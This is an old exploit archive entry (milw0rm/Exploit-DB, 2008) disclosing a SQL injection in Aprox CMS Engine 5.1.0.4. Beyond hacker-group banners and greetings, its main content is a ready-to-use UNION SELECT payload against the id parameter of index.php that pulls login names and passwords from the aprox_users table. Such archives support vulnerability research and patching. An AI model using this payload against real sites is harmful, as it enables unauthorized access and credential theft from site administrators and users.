Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection

EDB-ID:

6098

Author:

Mr.SQL

Type:

webapps

Platform:

PHP

Published:

2008-07-18

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Aprox CMS Engine V5.1.0.4 ( index.php page )
##                            
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
##
## Email  : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/index.php?id=-1'+UNION+SELECT+0,0,0,0,0,0,0,0,'MrSQL',0,password,login,0,0,0+FROM+aprox_users/*
##
########################
########################
 -[[ NOTE ]]-
1 ) dont use the tags in the exploite most get the info without concat()
2 ) Download script :  http://www.aprox.de/engine/data/files/AproxEngine_V5_1_04.zip

#######################################################################################################
#######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                         
 :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-07-18]